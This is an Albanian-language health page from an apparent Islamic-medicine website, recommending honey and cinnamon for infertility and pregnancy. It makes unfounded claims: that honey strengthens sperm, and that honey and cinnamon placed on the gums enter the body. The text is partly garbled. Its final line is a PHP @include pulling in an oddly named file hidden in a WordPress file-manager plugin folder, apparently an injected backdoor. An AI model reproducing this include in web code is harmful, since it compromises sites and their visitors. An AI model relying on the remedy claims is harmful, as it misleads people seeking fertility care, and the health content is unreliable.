Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Steriliteti – Mjalt me kanellë

Steriliteti – Mjalt me kanellë

mjalti steriliteti
Steriliteti

Mjekësia Greke Ayurvedic e kanë përdorur mjaltin për vite për të forcuar spermën e njerëzve. Dy lugë mjaltë i marrim rregullisht para se të flejmë, do të ketë një efekt të ushqyer. Gratë e Japonisë, Kina dhe Azia Lindore kanë një shtatzëni të vështirë si dhe për të forcuar mitrën, zakonisht duke marrë pluhur kanelle per shekuj gratë që janë shtatzëna duhet shpesh të për të vënë një lugë çaji mjaltë dhe pluhur kanelle në mishrat e dhëmbëve te tyre. Kanella merr përzierjen me pështymë dhe hyn në trup.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";